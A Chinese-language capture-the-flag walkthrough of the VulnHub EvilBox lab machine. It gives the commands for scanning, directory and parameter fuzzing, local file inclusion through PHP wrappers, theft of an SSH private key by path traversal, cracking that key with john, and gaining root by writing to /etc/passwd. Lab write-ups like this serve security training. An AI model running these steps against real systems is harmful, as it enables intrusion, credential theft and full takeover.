靶机地址:https://download.vulnhub.com/evilbox/EvilBoxhttps://download.vulnhub.com/evilbox/
难度等级:低→中
打靶目标:取得 root 权限 + 2 Flag
涉及攻击方法:
主机发现
网络扫描
强制访问
参数爆破
文件包含
PHP封装器
任意文件读取
SSH公钥登录
离线密码破解
系统权限漏洞利用
一、主机发现
fping -gaq 172.20.10.0/24
二、端口扫描
nmap -p22,80 -A 172.20.10.4
-A == -sV -sC -o
三、路径爆破-gobuster
gobuster dir -u http://172.20.10.4/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html.jsp
gobuster dir -u http://172.20.10.4/secret -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html.jsp
四、参数爆破
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:PARAM -w val.txt:VAL -u http://172.20.10.4/secret/evil.php?PARAM=VAL -fs 0
-fs 0 过滤掉空内容
利用文件包含爆破参数
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:PARAM -u http://172.20.10.4/secret/evil.php?PARAM=../index.html -fs 0
五、PHP封装器
利用PHP封装器读取源码
http://172.20.10.4/secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php
PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydjb21tYW5kJ107CiAgICBpbmNsdWRlKCRmaWxlbmFtZSk7Cj8+Cg== <?php $filename = $_GET['command']; include($filename); ?>
利用PHP封装器写入(需要写入权限)
MTIz为 123 bash64加密
六、SSH公钥登录
查看SSH支持那种登录方式
ssh mowree@172.20.10.4 -v
查看用户公钥
查看私钥
view-source:http://172.20.10.4/secret/evil.php?command=../../../../../../../../../home/mowree/.ssh/id_rsa
在kali主目录生成id_rsa文件,将私钥复制进id_rsa
给id_rsa设置相应权限
chmod 600 id_rsa
利用私钥登录
ssh mowree@172.20.10.4 -i id_rsa
选取大字典rockyou.txt 对私钥进行爆破
使用john对私钥进行爆破
1、将id_rsa转换为john可以识别的格式
2、使用john进行爆破
john hash --wordlist=rockyou.txt
七、系统权限漏洞利用
突破边界进行提权
利用可写权限文件
find / -writable 2>/dev/null | grep -v pro
发现/etc/passwd可写
给root用户生成密码
openssl passwd -1
密码:123
将生成的密码放在/etc/passwd
提权成功